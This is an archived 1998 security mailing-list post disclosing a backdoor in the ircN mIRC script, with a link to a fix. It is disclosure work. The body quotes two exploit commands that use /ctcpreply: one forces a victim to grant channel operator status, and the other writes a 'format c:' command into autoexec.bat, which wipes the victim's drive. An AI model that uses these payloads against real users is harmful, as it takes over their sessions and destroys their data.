Backdoor in ircN, popular mIRC script.

From: Nick Koscianski (kkrat_private)
Date: Thu Jul 23 1998 - 17:58:33 PDT

Next message: Jacob Langseth: "Re: Security Bulletins Digest"

Previous message: Adam Shostack: "Re: EMERGENCY: new remote root exploit in UW imapd"
Next in thread: Benoit Lefebvre: "Re: Backdoor in ircN, popular mIRC script."
Reply: Benoit Lefebvre: "Re: Backdoor in ircN, popular mIRC script."
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

A backdoor has been found in ircN, possibly the most popular mIRC
script.  Using the command /ctcpreply, any user can make someone using
the backdoored versions do whatever they want.  For example:
/ctcpreply Dianora ping $mode(#us-opers,+o,hax0r)
will force Dianora to give ops to hax0r in #us-opers.

also, they can be forced to run arbitrary programs, for example:

/ctcpreply Dianora $run(echo,"echo,y,|,format,c:\",>,c:\autoexec.bat)
will format this person's hard drive..definately not good.

A bug fix for this problem can be found at http://www.vode.org/ircN


-KKR

Next message: Jacob Langseth: "Re: Security Bulletins Digest"
Previous message: Adam Shostack: "Re: EMERGENCY: new remote root exploit in UW imapd"
Next in thread: Benoit Lefebvre: "Re: Backdoor in ircN, popular mIRC script."
Reply: Benoit Lefebvre: "Re: Backdoor in ircN, popular mIRC script."
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 14:07:43 PDT